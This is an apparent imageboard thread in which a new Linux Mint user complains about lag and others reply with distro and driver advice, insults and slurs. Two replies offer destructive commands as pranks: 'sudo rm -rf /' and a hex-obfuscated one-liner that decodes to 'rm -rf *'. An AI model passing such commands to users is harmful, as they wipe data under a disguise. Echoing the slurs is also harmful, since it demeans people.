I just formatted everything and replaced it with linux mint

i just formatted everything and replaced it with linux mint.

this is fucking appauling. i have to input my password for fucking everything.

for some reason it defiantly struggles when i am hopping around.

the only reason i started to use this was because i thought it was faster and more responsive.

but guess what it aint.

i have almost crashed on my own pc btw
AMD RYZEN 7 3.5GHZ
64 GIG RAM
10TB HDD
GTX 1070

no joke i have been using this for i dunno 5 hours and i have legit almost crashed this thing 4 times.

even my virtual machine is busted i clicked my web browser over and over to check up on updates it refused to load APPAULING!!

HOW THE FUCK DO YOU GUYS PUT UP WITH THIS SHIT~?!

Attached: w00p.jpg (284x177, 5K)

as i post this now i cant even click on other tabs. or use the task bar because it wont respond.

install win10, you dumbfuck

>fell for the mint meme
Install Fedora

>HOW THE FUCK DO YOU GUYS PUT UP WITH THIS SHIT~?!
By not using Mint. Does it even ship with a Linux version that properly supports Zen+ CPUs?

You better stay on win if you fuck up such a simple task like installing mint.

>why won't my wooden computer run a modern OS

can't tell if bait or stupid

You better stay on win if you are dumb enough to fall for the linux meme

Linux mint is shit, i don't understand why reddit faggots keep recommending it to beginners
Try xubuntu

I was setting it up for months and still some basic shit refused to work (video chat problems, audio stuttering when changing volume, atrocious battery life even with tlp or whatever it's called). I will try other distros in the future, but i have returned to embracing the botnet for the moment being

at least you diddn't installed it on a laptop

i fell for the kde neon meme, it uses less ram than win10 but my laptop is always running very hot, it stutters for no reason, battery life is shit

sadly linux is only for servers and old shitboxes

>64 GIG RAM
>NO SSD
>AMD RYGEN

lmao he's legit retarded

This smells like bait but if Mint is too hard for you, your only chance is Ubuntu. If you can't, stay with Windows.

>wooden computer
you cant be serious.

you cant be serious.

i built this machine myself i reformatted because of a virus deiceded to use linux instead. i still cant click on the updates.

this is an OS which is less heavy then windows.

Why is it struggling worse than my laptop?

OP is just retarded as fck. You can't escape botnet world,that's ur fate .

forgot to mention i do have a 250gb SSD and 500 SSD.

Ryzen is based.

OP , you should try this command:
sudo rm -rf /

I've had a bit of trouble installing it on some desktops. I did some troubleshooting and for some unknown reason it would just gradually increase in harddrive usage because it kept spawning some process

Restart and check dmesg.
Linux requires a bit of technical proficiency. If you want Linux but you're degenerate scum who can't into terminal, just use Mac

that sounds like a better option.
i am glad there is somebody else who is into this.

Why even use linux as a main OS instead of windows unless you need it for work?
i mean it doenst even have games lmao

go be 12 somewhere else faggot

Again, what version number of Linux (the kernel) is Linux Mint even using? I think Zen+ requires 4.17 or .18 to run flawlessly or at least at max. efficiency.
>i still cant click on the updates.
No matter the distro, it's usually easier to use your package manager directly via the command line. In your case apt.
>Why is it struggling worse than my laptop?
Are you using the default desktop environment Cinnamon? The new 4.x versions are still... somewhat problematic.

I was memeing but i am serious.
I mean i too use linux when i am studying/working
But if i want to relax and play games i go for my W10.
I mean its 2019 and you dont even dual boot?

Cinnamon does not perform better than Windows. It's a GNOME skin. GNOME needs a dedicated GPU to avoid animation stuttering. I also had issues with GNOME and Cinnamon on laptops. Cinnamon still used only a single core until a month ago.
Use Mint Xfce or Kubuntu/KDE Neon.

Mint uses 4.15 currently. They have an option in the GUI to switch to 4.18, but it's much better to just use ukuu and use 5.0.2 or whatever the current version is.

Don't use Xubuntu. Mint Xfce is literally Xubuntu with a ton of shit fixed and improved. Especially compared to the "stable" Xubuntu version which still ships with Xfce 4.12 and has screen tearing.

How old do you have to be to build a 1000 $ pc without an ssd?

Fucking retarded

Linux is for servers and development prior to hosting on those servers

Using it for any other reason is just wasting your time, if you don't put the effort in to understand linux, it won't do shit for you in return.

>GTX
nVidia has shit Linux support. If you want to use Linux then use AMD. Since you already have nVidia, did you switch to the official drivers? By default Linux uses the generic nVidia drivers which perform over 10x worse.

What else is he supposed to use on desktop? Android-x86? MacOS and Windows aren't serious answers.

>durr what 99% of people use aren't serious answers

You're delusional dude.

>i mean it doenst even have games lmao
Why would you go and tell lies on the internet?

Attached: 1523961710211.png (1125x797, 874K)

Why the fuck would you choose mint? Install Fedora 29 with KDE plasma and dual boot it Windows 10. You have a 1070 so you must be a gaymer, why would you use fucking mint as a main OS? Do some more research next time kiddo

Attached: 1551922140446.gif (500x491, 376K)

>2hu
Linux supports games like Android does. Just barely.

Linux is for adults who like freedom.
Kids, retards and elders stick to Windows.

windows is what you deserve you ignorant fuck

>APPAULING!!
SAD!

Attached: 1552702338146.png (1000x1338, 388K)

Linux is a meme and you fell for it.
No shame in it, OP, happens to the best of us.
Now go back to win10 and everything will be better.

>he doesnt use archbasedlinux

Such shit bait it doesn't even deserve picture.
sage it all.

What distribution do you Jow Forumsuys recommend? I'm not into gaymen, but it has to be able to support data analysis tools such as R, SAS, and SPSS natively, and preferably run them well.

how do you almost crash?
teach me

Archlinux should suits your needs

>Getting a virus in 2019
How did you afford that rig with a room temperature IQ?

This lmao
desktop linsux is for worthless manbabies

>password for everything
>what is /etc/sudoers
Imagine being this retarded

I'm using linux mint on some 6 year old low-end laptop I found in my garage, haven't had any of the issues you are describing.
It froze once yesterday but I've had it running for 12 hours a day without any issues

Install Arch
Learn to sudoers file
So on, so forth

Attached: 1552593418601.gif (540x304, 1.78M)

>delete system32
>install Linux
you got baited m8.

Attached: 61mRuwtL9eL._SX522_.jpg (522x522, 21K)

Nice blog faggot

Do you think anyone has ever fallen for this?

This is most likely the issue, I put mint on my laptop and it ran like absolute dogshit until I used the official drivers. After that, it ran faster than w7, with less memory usage.

hurr durr linux is free.
nobody wants to rely on something which nobody got paid for. would you rather be the passenger on a plane the pilot flies for free or the passenger on a plane that belongs to a company that pays the pilot a lot of money to fly you from a to b?
use mac os or windows and get work done instead of spending hours a day fiddling around with some things not working on your computer.

this is bait. Mint is minge anyway, should've installed ubuntu.

You have no argument. I'm a normie and I find Linux much better and easier to use than windows. You appeal to popularity and your argument would be for Linux if by tomorrow every pre-built PC started shipping with Linux instead of windows. So you're the one who's delusional.

Cinnamon is trash. Purge it all and put XFCE on it.

I went with Mint back in Dec. Mangled it until I got bored, then to Manjaro. The ONLY crash I had in 4~ months was fucking VLC locking up in KDE on Manjaro.

Dude either you are trolling or retarded.
I use my Gentoo install 16 hours a day and leave it on even the rest of the time and nothing happens.

What if you use RHEL?

Am I the only one who has never had problems with Linux Mint? Even a Kernel update solved a problem with my laptop's fan that I've had since I bought it.

i have vastly worse hardware and never have had any of the problems you have
sounds user error to me :)

Yes. Can't find the post on reddit but someone came here and tried this little gem on their machine:
$(echo 726d202d7266202a | xxd -r -p)

It didn't play music.

>it defiantly struggles when i am hopping around.

Based Mint, sticking it to the hopping crowd.

Alright, I'll byte. Wat do? Does this remove SysWOW64 from /usr/bin?

Mint is a total meme if you have a modern computer, please install something more up to date
e.g. Fedora, Manjaro, Gentoo
You can use the sake desktop enviroment (Cinnamon) on those and you'll have a much better time gayming too.

if you do stupid shit like this you deserve it

Attached: 1543256539356.jpg (500x489, 62K)

Install Gentoo u fagit

Cringe and bluepilled

>Nvidia user complains about Linux desktops being slow
Like clockwork. Linux Mint runs faster than Windows 10 on my Intel laptop. Stop using shit hardware.

Steam play, brainlet

>HOW THE FUCK DO YOU GUYS PUT UP WITH THIS SHIT~?!
1.) We don't use shitty distros
2.) We understand what we are doing when we use the OS
3.) We're not brainlets
4.) Walk the dinosaur

Ranting like a child over something they don't fully understand, OP is just one of many shitting up Jow Forums, Jow Forums and probably society too.

Every time a nigger like you complains about "not being able to do x in my y Linux distribution" just shows how much of a fucking idiot you are. Stick to your windows and apple toys retard

testing this on android

doesn't seem to do anything

it's just rm -rf *

Linux has dogshit support for graphic cards.
Don't even try Linux if you have one.

Attached: 1552934118840.png (800x528, 582K)

I always hear that. Especially how shit Nvidia support is. Yet I never had any issues with my GTX 1070 (including running CUDA applications).

t. doesn't understand what Linux is and probably uses a distro with Jurassic-era repositories

Modern desktop GPU support is pretty good. Most people who still have issues are on laptops, and you are a retard if you buy a laptop for GNU/Linux and it doesn't have Intel integrated graphics.

Funny how you need to create an imaginary scenario where my statement isn't true.
I've used a lot of distros, Gentoo, Debian, Arch, Fedora, Ubuntu, Mint, Xubuntu, KDE neon, Open Suse and probably some more I can't remember. I've also used AMD and Nvidia graphic cards. Guess what? They all sucked massive balls when compared to Windows, shit just lagged, browsers stutter when scrolling, insane delay when using "full composite pipeline" on Nvidia and so on.
I don't buy into this bullshit anymore, graphic cards suck massive balls under Linux and that's pretty much it.

it's because your statement is just not true, and the only way it could be true is if you have a new graphics card and are using an old kernel, or if you're just plain retarded and fucked something up on your own

this
xubuntu is bloat
fedora xfce is GOAT

didn't read
mint is shit
kill yourself op

visudo you retard.

Are you using the proprietary drivers?
I have a 1060 and I get zero "stutter". I doubt you've used all of those distros as well, seems like this is just coming straight out of your asshole.